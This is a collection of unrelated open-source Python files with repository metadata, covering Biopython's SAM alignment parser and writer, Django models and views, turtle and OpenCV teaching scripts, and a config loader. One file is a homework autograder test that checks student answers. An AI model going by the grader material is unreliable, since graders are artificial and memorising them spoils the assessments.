def send_bytes(self, *args, **kwargs): # real signature unknown
""" send the byte data from a readable buffer-like object """
pass
def __init__(self, handle, readable=True, writable=True): # real signature unknown; restored from __doc__
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __repr__(self): # real signature unknown; restored from __doc__
""" x.__repr__() <==> repr(x) """
pass
closed = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""True if the connection is closed"""
readable = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""True if the connection is readable"""
writable = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""True if the connection is writable"""
class SemLock(object):
""" Semaphore/Mutex type """
def acquire(self, *args, **kwargs): # real signature unknown
""" acquire the semaphore/lock """
pass
def release(self, *args, **kwargs): # real signature unknown
""" release the semaphore/lock """
pass
def _after_fork(self, *args, **kwargs): # real signature unknown
""" rezero the net acquisition count after fork() """
pass
def _count(self, *args, **kwargs): # real signature unknown
""" num of `acquire()`s minus num of `release()`s for this process """
pass
def _get_value(self, *args, **kwargs): # real signature unknown
""" get the value of the semaphore """
pass
def _is_mine(self, *args, **kwargs): # real signature unknown
""" whether the lock is owned by this thread """
pass
def _is_zero(self, *args, **kwargs): # real signature unknown
""" returns whether semaphore has value zero """
pass
@classmethod
def _rebuild(cls, *args, **kwargs): # real signature unknown
""" """
pass
def __enter__(self, *args, **kwargs): # real signature unknown
""" enter the semaphore/lock """
pass
def __exit__(self, *args, **kwargs): # real signature unknown
""" exit the semaphore/lock """
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
handle = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
kind = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
maxvalue = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
SEM_VALUE_MAX = 2147483647L
# variables with complex values
flags = {
'HAVE_FD_TRANSFER': 1,
'HAVE_SEM_OPEN': 1,
'HAVE_SEM_TIMEDWAIT': 1,
}
|
[
"sirnikolasd@yandex.ru"
] |
sirnikolasd@yandex.ru
|
ba7cf89efb3b3e047499591256a9cb869bc442da
|
351f709d96fc08b2f42f2dd42efe02bff76f41a3
|
/turtleDraw.py
|
43a47232ccafb0270905bcad25214f5e0d2dae93
|
[] |
no_license
|
ChristopherGawdzikD/Turtles
|
69f9a36627eeea5e7f1d38bbce6126fbe09c91d9
|
8eeb33f2706c15ba6e4bbb869cada5bebf941616
|
refs/heads/master
| 2022-12-04T00:02:12.125401
| 2020-08-16T18:54:40
| 2020-08-16T18:54:40
| 288,003,895
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 270
|
py
|
from turtle import*
def getAudiLogo():
# Will make audi logo
#Uses two for loops with one nested
for i in range(4):
for x in ["grey"]:
color(x)
pensize(5)
circle(50)
forward(60)
print(getAudiLogo())
|
[
"noreply@github.com"
] |
noreply@github.com
|
78db018846126fb9febd6f19a4e4506f2d44c459
|
4ea4f9f8cbb652aea7f82089eb39b8a86a466a81
|
/lib/muchos/config/__init__.py
|
13294f17e2ca9040fc4f68596eaa0a65f18d19d9
|
[
"Apache-2.0"
] |
permissive
|
shannawaz/fluo-muchos
|
62ef9bf65baae3a823630fc11e35b4620aac2056
|
98102a5b14a71642a7972d20d57b38373a375577
|
refs/heads/master
| 2020-09-24T02:40:37.204495
| 2020-03-24T18:06:38
| 2020-03-24T18:06:38
| 225,641,914
| 0
| 0
|
Apache-2.0
| 2019-12-03T14:37:26
| 2019-12-03T14:37:26
| null |
UTF-8
|
Python
| false
| false
| 1,700
|
py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from muchos.config.base import BaseConfig, SERVICES, OPTIONAL_SERVICES
from muchos.config.existing import ExistingDeployConfig
from muchos.config.ec2 import Ec2DeployConfig
from muchos.config.azure import AzureDeployConfig
from configparser import ConfigParser
def DeployConfig(deploy_path, config_path, hosts_path, checksums_path, templates_path, cluster_name):
c = ConfigParser()
c.read(config_path)
cluster_type = c.get('general', 'cluster_type')
if cluster_type == 'existing':
return ExistingDeployConfig(deploy_path, config_path, hosts_path, checksums_path, templates_path, cluster_name)
if cluster_type == 'ec2':
return Ec2DeployConfig(deploy_path, config_path, hosts_path, checksums_path, templates_path, cluster_name)
if cluster_type == 'azure':
return AzureDeployConfig(deploy_path, config_path, hosts_path, checksums_path, templates_path, cluster_name)
|
[
"kturner@apache.org"
] |
kturner@apache.org
|
e87ab2c053552be6df6333daf37c54e1c4e56527
|
3adf9934a74077c328b9a0afff37f8ca355eead1
|
/comicresizer/forms.py
|
a2f083f2fd6d9a8ab0f950d16e2e7b6010e34b3e
|
[] |
no_license
|
jgasteiz/comic-resizer
|
36671623fe9909f23fba793b44cf4ac56380926a
|
12d2e12efdf2017746d67a4b6d9616613ee58bb9
|
refs/heads/master
| 2021-07-05T05:56:00.911958
| 2017-09-27T07:43:58
| 2017-09-27T07:45:25
| 104,987,910
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 105
|
py
|
from django import forms
class ComicUploadForm(forms.Form):
file = forms.FileField(required=False)
|
[
"javi.manzano.oller@gmail.com"
] |
javi.manzano.oller@gmail.com
|
746945952b0fab1f51ee929ad0f0cbeb6aad6a22
|
4fd90203c000cc4c15fc6d4538e9536f812af05a
|
/Chapter05/Erosion_Dilation.py
|
c59037f09ddb47686ea3c34fcf5f01d7aa86b049
|
[
"MIT"
] |
permissive
|
drabdkadir/GettingStartedwithPythonfortheInternetofThings
|
77487bbece9fd73ac7d5759d108686e6348dee66
|
86b57062879baaafd8a7ad332057359874bb3978
|
refs/heads/master
| 2020-12-06T15:41:03.055803
| 2019-02-19T10:09:20
| 2019-02-19T10:09:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,361
|
py
|
# Erosion and Dilation are Morphological Operations
# Erosion: Removes pixels at the boundaries of objects in an image
# Dilation: Adds pixels to the boundaries of objects in an image
# Import Computer Vision package - cv2
import cv2
# Import Numerical Python package - numpy as np
import numpy as np
# Read the image using imread built-in function
image = cv2.imread('image_4.jpg')
# Display original image using imshow built-in function
cv2.imshow("Original", image)
# Wait until any key is pressed
cv2.waitKey(0)
# np.ones returns an array, given shape and type, filled with ones
# np.ones(shape, dtype)
kernel = np.ones((5,5), dtype = "uint8")
# 5 x 5 is the dimension of the kernal
# uint8: is an unsigned integer (0 to 255)
# cv2.erode is the built-in function used for erosion
# cv2.erode(image, kernel, iterations)
erosion = cv2.erode(image, kernel, iterations = 1)
# Display image after erosion using imshow built-in function
cv2.imshow("Erosion", erosion)
# Wait until any key is pressed
cv2.waitKey(0)
# cv2.dilate is the built-in function used for dilation
# cv2.dilate(image, kernel, iterations)
dilation = cv2.dilate(image, kernel, iterations = 1)
# Display image after dilation using imshow built-in function
cv2.imshow("Dilation", dilation)
# Wait until any key is pressed
cv2.waitKey(0)
# Close all windows
cv2.destroyAllWindows()
|
[
"packtadrian@gmail.com"
] |
packtadrian@gmail.com
|
dfffaf1c880faeb1839261b33d4f3388ffc6080d
|
6a84e70184c2ea229a0db4f472426d7d585a1a4a
|
/turtle/lego_heads/head_c_while.py
|
74d373d3ad6ccfd35150faee6d67bf72d756765e
|
[] |
no_license
|
GBSL-Informatik/python-examples
|
5bcf89e255b05dac4a6b7e55efbbe144a2acc070
|
b0ac92a8ebda2cc665d0cc4a8f3d69f3ccfb211f
|
refs/heads/master
| 2023-01-02T15:28:27.863878
| 2020-11-01T21:00:19
| 2020-11-01T21:00:19
| 283,978,874
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 662
|
py
|
from gbsl_turtle import *
goto(-30, 0, draw=False)
counter = 0
while counter < 8:
forward(60)
left(45)
counter = counter + 1
goto(-30, 100, draw=False)
setheading(180) # Orientierung nach links: ◀️
counter = 0
while counter < 8:
forward(5)
right(45)
counter = counter + 1
goto(30, 100, draw=False)
setheading(0) # Orientierung nach rechts: ▶️
counter = 0
while counter < 8:
forward(5)
left(45)
counter = counter + 1
goto(-48, 40, draw=False)
setheading(-45) # Orientierung nach rechts unten: ↘️
counter = 0
while counter < 3:
forward(40)
left(45)
counter = counter + 1
done()
|
[
"lebalz@outlook.com"
] |
lebalz@outlook.com
|
05da5fd12fbafb2386db3b2f9980d4c9d9063e02
|
5d34689e0fe3dea453416bd7849b8028e1a0b3e4
|
/Bio/Align/sam.py
|
522ded168bad2599cfc7bd7e1c5d2cc887ca7f9c
|
[
"BSD-3-Clause",
"LicenseRef-scancode-biopython"
] |
permissive
|
fabianegli/biopython
|
2996d4209933b15e42db7e95f4a36d84a4df0ebd
|
06a96c0311ec7a8b714adff9f8b6d3414ecc70a0
|
refs/heads/master
| 2022-09-04T15:33:07.733522
| 2022-08-09T10:18:45
| 2022-08-09T10:18:45
| 167,009,089
| 0
| 0
|
NOASSERTION
| 2022-06-15T13:27:43
| 2019-01-22T14:34:52
|
Python
|
UTF-8
|
Python
| false
| false
| 30,190
|
py
|
# Copyright 2022 by Michiel de Hoon. All rights reserved.
#
# This file is part of the Biopython distribution and governed by your
# choice of the "Biopython License Agreement" or the "BSD 3-Clause License".
# Please see the LICENSE file that should have been included as part of this
# package.
"""Bio.Align support for the "sam" pairwise alignment format.
The Sequence Alignment/Map (SAM) format, created by Heng Li and Richard Durbin
at the Wellcome Trust Sanger Institute, stores a series of alignments to the
genome in a single file. Typically they are used for next-generation sequencing
data. SAM files store the alignment positions for mapped sequences, and may
also store the aligned sequences and other information associated with the
sequence.
See http://www.htslib.org/ for more information.
You are expected to use this module via the Bio.Align functions.
Coordinates in the SAM format are defined in terms of one-based start
positions; the parser converts these to zero-based coordinates to be consistent
with Python and other alignment formats.
"""
from itertools import chain
import copy
try:
import numpy
except ImportError:
from Bio import MissingPythonDependencyError
raise MissingPythonDependencyError(
"Please install numpy if you want to use Bio.Align. "
"See http://www.numpy.org/"
) from None
from Bio.Align import Alignment
from Bio.Align import interfaces
from Bio.Seq import Seq, reverse_complement, UndefinedSequenceError
from Bio.SeqRecord import SeqRecord
from Bio import BiopythonExperimentalWarning
import warnings
warnings.warn(
"Bio.Align.sam is an experimental module which may undergo "
"significant changes prior to its future official release.",
BiopythonExperimentalWarning,
)
class AlignmentWriter(interfaces.AlignmentWriter):
"""Alignment file writer for the Sequence Alignment/Map (SAM) file format."""
def __init__(self, target, md=False):
"""Create an AlignmentWriter object.
Arguments:
- md - If True, calculate the MD tag from the alignment and include it
in the output.
If False (default), do not include the MD tag in the output.
"""
super().__init__(target, mode="w")
self.md = md
def write_header(self, alignments):
"""Write the SAM header."""
try:
metadata = alignments.metadata
except AttributeError:
metadata = {}
try:
targets = alignments.targets
except AttributeError:
targets = {}
values = metadata.get("HD")
if values is not None:
# if HD is present, then VN is required and must come first
fields = ["@HD", "VN:%s" % values["VN"]]
for key, value in values.items():
if key == "VN":
continue
fields.append("%s:%s" % (key, value))
line = "\t".join(fields) + "\n"
self.stream.write(line)
for rname, record in targets.items():
assert rname == record.id
fields = ["@SQ"]
fields.append("SN:%s" % rname)
length = len(record.seq)
fields.append("LN:%d" % length)
for key, value in record.annotations.items():
if key == "alternate_locus":
fields.append("AH:%s" % value)
elif key == "names":
fields.append("AN:%s" % ",".join(value))
elif key == "assembly":
fields.append("AS:%s" % value)
elif key == "MD5":
fields.append("M5:%s" % value)
elif key == "species":
fields.append("SP:%s" % value)
elif key == "topology":
assert value in ("linear", "circular")
fields.append("PP:%s" % value)
elif key == "URI":
fields.append("UR:%s" % value)
else:
fields.append("%s:%s" % (key[:2], value))
try:
description = record.description
except AttributeError:
pass
else:
if description != "<unknown description>":
fields.append("DS:%s" % description)
line = "\t".join(fields) + "\n"
self.stream.write(line)
for tag, rows in metadata.items():
if tag == "HD": # already written
continue
for row in rows:
fields = ["@" + tag]
for key, value in row.items():
fields.append("%s:%s" % (key, value))
line = "\t".join(fields) + "\n"
self.stream.write(line)
def format_alignment(self, alignment, md=None):
"""Return a string with a single alignment formatted as one SAM line."""
if not isinstance(alignment, Alignment):
raise TypeError("Expected an Alignment object")
coordinates = alignment.coordinates.transpose()
target, query = alignment.sequences
hard_clip_left = None
hard_clip_right = None
try:
qName = query.id
except AttributeError:
qName = "query"
qual = "*"
else:
try:
hard_clip_left = query.annotations["hard_clip_left"]
except (AttributeError, KeyError):
pass
try:
hard_clip_right = query.annotations["hard_clip_right"]
except (AttributeError, KeyError):
pass
try:
qual = query.letter_annotations["phred_quality"]
except (AttributeError, KeyError):
qual = "*"
query = query.seq
qSize = len(query)
try:
rName = target.id
except AttributeError:
rName = "target"
else:
target = target.seq
tSize = len(target)
if coordinates[0, 1] < coordinates[-1, 1]: # mapped to forward strand
flag = 0
else: # mapped to reverse strand
flag = 16
query = reverse_complement(query, inplace=False)
coordinates = numpy.array(coordinates)
coordinates[:, 1] = qSize - coordinates[:, 1]
hard_clip_left, hard_clip_right = hard_clip_right, hard_clip_left
try:
query = bytes(query)
except TypeError: # string
pass
except UndefinedSequenceError:
query = "*"
else:
query = str(query, "ASCII")
tStart, qStart = coordinates[0, :]
pos = tStart
cigar = ""
if hard_clip_left is not None:
cigar += "%dH" % hard_clip_left
if qStart > 0:
cigar += "%dS" % qStart
try:
operations = alignment.operations
except AttributeError:
operations = None
for tEnd, qEnd in coordinates[1:, :]:
tCount = tEnd - tStart
qCount = qEnd - qStart
if tCount == 0:
cigar += "%dI" % qCount # insertion to the reference
qStart = qEnd
elif qCount == 0:
cigar += "%dD" % tCount # deletion from the reference
tStart = tEnd
else:
if tCount != qCount:
raise ValueError("Unequal step sizes in alignment")
cigar += "%dM" % tCount
tStart = tEnd
qStart = qEnd
else:
for operation, (tEnd, qEnd) in zip(operations, coordinates[1:, :]):
tCount = tEnd - tStart
qCount = qEnd - qStart
if tCount == 0:
assert operation == ord("I")
cigar += "%dI" % qCount # insertion to the reference
qStart = qEnd
elif qCount == 0:
if operation == ord("N"):
cigar += "%dN" % tCount # skipped region from the reference
elif operation == ord("D"):
cigar += "%dD" % tCount # deletion from the reference
else:
raise ValueError(f"Unexpected operation {operation}")
tStart = tEnd
else:
if tCount != qCount:
raise ValueError("Unequal step sizes in alignment")
assert operation == ord("M")
cigar += "%dM" % tCount
tStart = tEnd
qStart = qEnd
if qEnd < qSize:
cigar += "%dS" % (qSize - qEnd)
if hard_clip_right is not None:
cigar += "%dH" % hard_clip_right
try:
mapq = alignment.mapq
except AttributeError:
mapq = 255 # not available
rNext = "*"
pNext = 0
tLen = 0
fields = [
qName,
str(flag),
rName,
str(pos + 1), # 1-based coordinates
str(mapq),
cigar,
rNext,
str(pNext),
str(tLen),
query,
qual,
]
if md is None:
md = self.md
if md is True:
if query == "*":
raise ValueError("requested MD tag with undefined sequence")
# calculate the MD tag from the alignment coordinates and sequences
tStart, qStart = coordinates[0, :]
number = 0
md = ""
if operations is None:
for tEnd, qEnd in coordinates[1:, :]:
tCount = tEnd - tStart
qCount = qEnd - qStart
if tCount == 0:
# insertion to the reference
qStart = qEnd
elif qCount == 0:
length = tCount
if True:
# deletion from the reference
if number:
md += str(number)
number = 0
md += "^" + target[tStart:tEnd]
tStart = tEnd
else:
# alignment match
if tCount != qCount:
raise ValueError("Unequal step sizes in alignment")
for tc, qc in zip(target[tStart:tEnd], query[qStart:qEnd]):
if tc == qc:
number += 1
else:
md += str(number) + tc
number = 0
tStart = tEnd
qStart = qEnd
if number:
md += str(number)
else:
for operation, (tEnd, qEnd) in zip(operations, coordinates[1:, :]):
tCount = tEnd - tStart
qCount = qEnd - qStart
if tCount == 0:
# insertion to the reference
qStart = qEnd
elif qCount == 0:
length = tCount
if operation != ord("N"):
# deletion from the reference
if number:
md += str(number)
number = 0
md += "^" + target[tStart:tEnd]
tStart = tEnd
else:
# alignment match
if tCount != qCount:
raise ValueError("Unequal step sizes in alignment")
for tc, qc in zip(target[tStart:tEnd], query[qStart:qEnd]):
if tc == qc:
number += 1
else:
md += str(number) + tc
number = 0
tStart = tEnd
qStart = qEnd
if number:
md += str(number)
field = "MD:Z:%s" % md
fields.append(field)
try:
score = alignment.score
except AttributeError:
pass
else:
field = "AS:i:%d" % int(round(score))
fields.append(field)
try:
annotations = alignment.annotations
except AttributeError:
pass
else:
for key, value in annotations.items():
if isinstance(value, int):
datatype = "i"
value = str(value)
elif isinstance(value, float):
datatype = "f"
value = str(value)
elif isinstance(value, str):
if len(value) == 1:
datatype = "A"
else:
datatype = "Z"
elif isinstance(value, bytes):
datatype = "H"
value = "".join(map(str, value))
elif isinstance(value, numpy.array):
datatype = "B"
if numpy.issubdtype(value.dtype, numpy.integer):
letter = "i"
elif numpy.issubdtype(value.dtype, float):
letter = "f"
else:
raise ValueError(
f"Array of incompatible data type {value.dtype} in annotation '{key}'"
)
value = ",".join(map(str, value))
field = f"{key}:{datatype}:{value}"
fields.append(field)
line = "\t".join(fields) + "\n"
return line
class AlignmentIterator(interfaces.AlignmentIterator):
"""Alignment iterator for Sequence Alignment/Map (SAM) files.
Each line in the file contains one genomic alignment, which are loaded
and returned incrementally. The following columns are stored as attributes
of the alignment:
- flag: The FLAG combination of bitwise flags;
- mapq: Mapping Quality (only stored if available)
- rnext: Reference sequence name of the primary alignment of the next read
in the alignment (only stored if available)
- pnext: Zero-based position of the primary alignment of the next read in
the template (only stored if available)
- tlen: signed observed template length (only stored if available)
Other information associated with the alignment by its tags are stored in
the annotations attribute of each alignment.
Any hard clipping (clipped sequences not present in the query sequence)
are stored as 'hard_clip_left' and 'hard_clip_right' in the annotations
dictionary attribute of the query sequence record.
The sequence quality, if available, is stored as 'phred_quality' in the
letter_annotations dictionary attribute of the query sequence record.
"""
def __init__(self, source):
"""Create an AlignmentIterator object.
Arguments:
- source - input data or file name
"""
super().__init__(source, mode="t", fmt="SAM")
def _read_header(self, stream):
self.metadata = {}
self.targets = {}
for line in stream:
if not line.startswith("@"):
self._line = line
break
fields = line[1:].strip().split("\t")
tag = fields[0]
values = {}
if tag == "SQ":
annotations = {}
description = None
for field in fields[1:]:
key, value = field.split(":", 1)
assert len(key) == 2
if key == "SN":
rname = value
elif key == "LN":
length = int(value)
elif key == "AH":
annotations["alternate_locus"] = value
elif key == "AN":
annotations["names"] = value.split(",")
elif key == "AS":
annotations["assembly"] = value
elif key == "DS":
description = value
elif key == "M5":
annotations["MD5"] = value
elif key == "SP":
annotations["species"] = value
elif key == "TP":
assert value in ("linear", "circular")
annotations["topology"] = value
elif key == "UR":
annotations["URI"] = value
else:
annotations[key] = value
assert rname not in self.targets
sequence = Seq(None, length=length)
record = SeqRecord(sequence, id=rname, annotations=annotations)
if description is not None:
record.description = description
self.targets[rname] = record
else:
for field in fields[1:]:
key, value = field.split(":", 1)
assert len(key) == 2
values[key] = value
if tag == "HD":
self.metadata[tag] = values
else:
if tag not in self.metadata:
self.metadata[tag] = []
self.metadata[tag].append(values)
def _read_next_alignment(self, stream):
try:
line = self._line
except AttributeError:
lines = stream
else:
lines = chain([line], stream)
del self._line
for line in lines:
fields = line.split()
if len(fields) < 11:
raise ValueError(
"line has %d columns; expected at least 11" % len(fields)
)
qname = fields[0]
flag = int(fields[1])
rname = fields[2]
target_pos = int(fields[3]) - 1
mapq = int(fields[4])
cigar = fields[5]
rnext = fields[6]
pnext = int(fields[7]) - 1
tlen = int(fields[8])
query = fields[9]
qual = fields[10]
md = None
score = None
annotations = {}
column_annotations = {}
for field in fields[11:]:
tag, datatype, value = field.split(":", 2)
if tag == "AS":
assert datatype == "i"
score = int(value)
elif tag == "MD":
assert datatype == "Z"
md = value
else:
if datatype == "i":
value = int(value)
elif datatype == "f":
value = float(value)
elif datatype in ("A", "Z"): # string
pass
elif datatype == "H":
n = len(value)
value = bytes(int(value[i : i + 2]) for i in range(0, n, 2))
elif datatype == "B":
letter = value[0]
value = value[1:].split(",")
if letter in "cCsSiI":
dtype = int
elif letter == "f":
dtype = float
else:
raise ValueError(
f"Unknown number type '{letter}' in tag '{field}'"
)
value = numpy.array(value, dtype)
annotations[tag] = value
if flag & 0x10:
strand = "-"
else:
strand = "+"
hard_clip_left = None
hard_clip_right = None
store_operations = False
if flag & 0x4: # unmapped
target = None
coordinates = None
elif md is None:
query_pos = 0
coordinates = [[target_pos, query_pos]]
number = ""
operations = bytearray()
for letter in cigar:
if letter == "M":
# M: alignment match
length = int(number)
target_pos += length
query_pos += length
elif letter in "=X":
# =: sequence match
# X: sequence mismatch
length = int(number)
target_pos += length
query_pos += length
store_operations = True
elif letter == "I":
# I: insertion to the reference
length = int(number)
query_pos += length
elif letter == "S":
# S: soft clipping
length = int(number)
if query_pos == 0:
coordinates[0][1] += length
query_pos += length
number = ""
continue
elif letter == "D":
# D: deletion from the reference
length = int(number)
target_pos += length
elif letter == "N":
# N: skipped region from the reference
length = int(number)
target_pos += length
store_operations = True
elif letter == "H": # hard clipping
if query_pos == 0:
hard_clip_left = int(number)
else:
hard_clip_right = int(number)
number = ""
continue
elif letter == "P": # padding
raise NotImplementedError(
"padding operator is not yet implemented"
)
else:
number += letter
continue
coordinates.append([target_pos, query_pos])
operations.append(ord(letter))
number = ""
target = self.targets.get(rname)
if target is None:
if self.targets:
raise ValueError(f"Found target {rname} missing from header")
target = SeqRecord(None, id=rname)
else:
query_pos = 0
coordinates = [[target_pos, query_pos]]
seq = query
target = ""
starts = [target_pos]
size = 0
sizes = []
number = ""
operations = bytearray()
for letter in cigar:
if letter in "M":
# M: alignment match
length = int(number)
target_pos += length
query_pos += length
target += seq[:length]
seq = seq[length:]
size += length
elif letter in "=X":
# =: sequence match
# X: sequence mismatch
length = int(number)
target_pos += length
query_pos += length
target += seq[:length]
seq = seq[length:]
size += length
store_operations = True
elif letter == "I":
# I: insertion to the reference
length = int(number)
query_pos += length
seq = seq[length:]
elif letter == "S":
# S: soft clipping
length = int(number)
if query_pos == 0:
coordinates[0][1] += length
query_pos += length
seq = seq[length:]
number = ""
continue
elif letter == "D": # deletion from the reference
length = int(number)
target_pos += length
size += length
starts.append(target_pos)
sizes.append(size)
size = 0
elif letter == "N": # skipped region from the reference
length = int(number)
target_pos += length
starts.append(target_pos)
sizes.append(size)
size = 0
store_operations = True
elif letter == "H":
# hard clipping (clipped sequences not present in sequence)
if query_pos == 0:
hard_clip_left = int(number)
else:
hard_clip_right = int(number)
number = ""
continue
elif letter == "P": # padding
raise NotImplementedError(
"padding operator is not yet implemented"
)
else:
number += letter
continue
coordinates.append([target_pos, query_pos])
operations.append(ord(letter))
number = ""
sizes.append(size)
seq = target
target = ""
number = ""
letters = iter(md)
for letter in letters:
if letter in "ACGTNacgtn":
if number:
number = int(number)
target += seq[:number]
seq = seq[number:]
number = ""
target += letter
seq = seq[1:]
elif letter == "^":
if number:
number = int(number)
target += seq[:number]
seq = seq[number:]
number = ""
for letter in letters:
if letter not in "ACGTNacgtn":
break
target += letter
else:
break
number = letter
else:
number += letter
if number:
number = int(number)
target += seq[:number]
seq = target
target = copy.deepcopy(self.targets[rname])
length = len(target.seq)
data = {}
index = 0
for start, size in zip(starts, sizes):
data[start] = seq[index : index + size]
index += size
target.seq = Seq(data, length=length)
if coordinates is not None:
coordinates = numpy.array(coordinates).transpose()
if strand == "-":
coordinates[1, :] = query_pos - coordinates[1, :]
if query == "*":
length = query_pos
sequence = Seq(None, length=length)
else:
sequence = Seq(query)
if not (flag & 0x4): # not unmapped
assert len(query) == query_pos
if strand == "-":
sequence = sequence.reverse_complement()
query = SeqRecord(sequence, id=qname)
if strand == "-":
hard_clip_left, hard_clip_right = hard_clip_right, hard_clip_left
if hard_clip_left is not None:
query.annotations["hard_clip_left"] = hard_clip_left
if hard_clip_right is not None:
query.annotations["hard_clip_right"] = hard_clip_right
if qual != "*":
query.letter_annotations["phred_quality"] = qual
records = [target, query]
alignment = Alignment(records, coordinates)
alignment.flag = flag
if mapq != 255:
alignment.mapq = mapq
if rnext == "=":
alignment.rnext = rname
elif rnext != "*":
alignment.rnext = rnext
if pnext >= 0:
alignment.pnext = pnext
if tlen != 0:
alignment.tlen = tlen
if score is not None:
alignment.score = score
if annotations:
alignment.annotations = annotations
if hard_clip_left is not None:
alignment.hard_clip_left = hard_clip_left
if hard_clip_right is not None:
alignment.hard_clip_right = hard_clip_right
if store_operations:
alignment.operations = operations
return alignment
|
[
"noreply@github.com"
] |
noreply@github.com
|
bd46f51391adaab5845a6bb2c79fc3eaaea9933a
|
878ef94475b349e567f4cae860fc72fc10b98b37
|
/tests/test_src_introspection.py
|
44936aba966194503e6b4ce68c650a21b71cc7dc
|
[
"BSD-2-Clause"
] |
permissive
|
alexswerner/robotpkg_helpers
|
ec75180a748c5b0af3efed0762a66442469471f8
|
4cda66e8b9eeedc4dea9f5d4754595e2813a10ad
|
refs/heads/master
| 2021-05-19T13:34:59.518543
| 2020-04-03T01:22:05
| 2020-04-03T01:22:05
| 251,726,724
| 0
| 0
|
BSD-2-Clause
| 2020-03-31T20:43:00
| 2020-03-31T20:43:00
| null |
UTF-8
|
Python
| false
| false
| 1,005
|
py
|
#!/usr/bin/python3
from unittest import TestCase
from robotpkg_helpers import RobotpkgSrcIntrospection
from robotpkg_helpers import init_environment_variables
from robotpkg_helpers.utils import add_robotpkg_mng_variables
robotpkg_root='/integration_tests/robotpkg-test-rc'
#robotpkg_vars = add_robotpkg_mng_variables(robotpkg_root)
arpg_src_intros = RobotpkgSrcIntrospection(ROBOTPKG_ROOT_SRC=robotpkg_root+'/robotpkg')
add_robotpkg_mng_variables(arpg_src_intros)
init_environment_variables(arpg_src_intros,robotpkg_root)
arpg_src_intros.display()
arpg_src_intros.save('rpg_src_intros.json')
arpg_src_intros.package_dict['jrl-walkgen-v3'].is_rpkg_installed(arpg_src_intros.robotpkg_mng_vars['ROBOTPKG_BASE'],arpg_src_intros.env)
arpg_src_intros.package_dict['pinocchio'].is_rpkg_installed(arpg_src_intros.robotpkg_mng_vars['ROBOTPKG_BASE'],arpg_src_intros.env)
arpg_src_intros.package_dict['talos-simulation'].is_rpkg_installed(arpg_src_intros.robotpkg_mng_vars['ROBOTPKG_BASE'],arpg_src_intros.env)
|
[
"ostasse@laas.fr"
] |
ostasse@laas.fr
|
ba86f9ca658290dd2ff911890bc481e0c6568938
|
82e7b27cc4377def80c2b475645d502e40a0e498
|
/newsletter/migrations/0009_auto_20160215_0258.py
|
d627d656950946d66269e848a6dd0b1a53943507
|
[] |
no_license
|
craYBoi/bryte
|
850698e735a08ea10a08a78dc9e23b7e760c682f
|
d2b5a74d200ccb06cc3ef4e3180b83cbc338ce3e
|
refs/heads/master
| 2022-12-12T08:54:56.863372
| 2017-06-28T05:03:32
| 2017-06-28T05:03:32
| 63,019,677
| 0
| 0
| null | 2022-11-22T01:00:25
| 2016-07-10T21:44:41
|
CSS
|
UTF-8
|
Python
| false
| false
| 475
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-02-15 02:58
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('newsletter', '0008_auto_20160215_0249'),
]
operations = [
migrations.AlterField(
model_name='price',
name='price',
field=models.PositiveSmallIntegerField(blank=True, null=True),
),
]
|
[
"baoyuyang@Yuyangs-MacBook-Pro.local"
] |
baoyuyang@Yuyangs-MacBook-Pro.local
|
d4198914f012849544bc1c5edb24c3a5c7164a20
|
6151a3c25988eb4eac0c00289b90b2e42d4960eb
|
/homeworks/HW01/tests/q3.1.4.py
|
169c9f8d67015fae9fa40c7ff6828bffde9e7c4e
|
[] |
no_license
|
BC-COMS-2710/summer21-material
|
8e3bbbb375433fa0b575cf39eed4bdf2d3b486d3
|
f07ffc1595d7a924a5fca0636161ded26b28e655
|
refs/heads/master
| 2023-05-28T22:52:25.941752
| 2021-06-10T14:44:42
| 2021-06-10T14:44:42
| 353,820,186
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 545
|
py
|
test = { 'name': 'q3.1.4',
'points': [0.1, 0.1],
'suites': [ { 'cases': [ {'code': '>>> assert easiest_fres_pres != ...;\n>>> assert easiest_fres_year != ...\n', 'hidden': False, 'locked': False},
{'code': '>>> assert type(easiest_fres_pres) == str;\n>>> assert "int" in str(type(easiest_fres_year))\n', 'hidden': False, 'locked': False}],
'scored': True,
'setup': '',
'teardown': '',
'type': 'doctest'}]}
|
[
"azpoliak@gmail.com"
] |
azpoliak@gmail.com
|
f0a267d44630536aca0d49d18c4e2b1a5ad6841f
|
2d9fd57b30cfdda54b1277729b8e50d82120197c
|
/PEPapp/PEPapp/view.py
|
fdf075d1ae834a8d568882fc59760f3b36eafc71
|
[] |
no_license
|
paulinsider/PEP
|
c7f07c8d7a058525ceec5110d4361d74fe810b1c
|
68f43a36aae05322dae7b9742429d51416e6f2af
|
refs/heads/master
| 2021-01-19T18:23:06.492274
| 2017-08-29T08:31:27
| 2017-08-29T08:31:27
| 101,129,826
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,706
|
py
|
from django.http import HttpResponse,JsonResponse
from ContainerModel.models import Container_list
from django.shortcuts import render
import os
def index(request):
return render(request, 'common/index.html')
def list(request):
response = []
list = Container_list.objects.all()
